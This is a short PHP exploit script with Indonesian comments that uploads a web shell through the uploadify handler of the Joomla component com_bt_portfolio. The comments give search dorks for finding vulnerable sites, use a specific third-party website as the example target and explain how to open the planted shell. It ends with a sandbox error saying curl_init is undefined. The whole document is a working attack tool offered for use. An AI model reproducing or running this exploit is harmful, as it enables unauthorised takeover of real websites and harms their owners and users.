<?php
# Exploit uploadify pada component Joomla com_bt_portfolio
# Exploit ini sama dengan exploit uploadify pada umumnya, yang berbeda cuma url exploitnya..
# Shell yang kamu upload (dalam kasus ini saya beri nama set.php) harus 1 direktori dengan uploader ini.
# Save script ini dengan ekstensi php, kemudian kamu tinggal jalankan di terminal (Linux) atau CMD (Windows)
# Dork yang bisa kamu gunakan adalah "templates/bt_foto" & "/templates/bt_metro"
# Misalkan situsnya seperti ini => http://greenclaws.co.uk/templates/bt_foto/
# Kamu tinggal ubah saja menjadi => http://greenclaws.co.uk/administrator/components/com_bt_portfolio/helpers/uploadify/uploadify.php
# Setelah itu kamu masukkan ke dalam script ini dan langsung aja eksekusi di terminal atau cmd
# Kamu jalankan dengan perintah => php namafileini.php
# Jika berhasil, maka akan muncul path shellnya seperti gambar berikut ini: http://i.imgur.com/Vrkdqzf.png
# Kalau sudah seperti ini tinggal kamu buka di browser urlnya menjadi => http://greenclaws.co.uk/administrator/components/com_bt_portfolio/set.php
#
#
# Spesial for Indonesian Cyber Army dan orang-orang yang menganggapku teman ^_^
$uploadfile="set.php";
$ch =curl_init("situs.com/administrator/components/com_bt_portfolio/helpers/uploadify/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile",'folder'=>"/administrator/components/com_bt_portfolio/"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
Fatal error: Uncaught Error: Call to undefined function curl_init() in /in/1dHrr:21
Stack trace:
#0 {main}
thrown in /in/1dHrr on line 21
Process exited with code 255.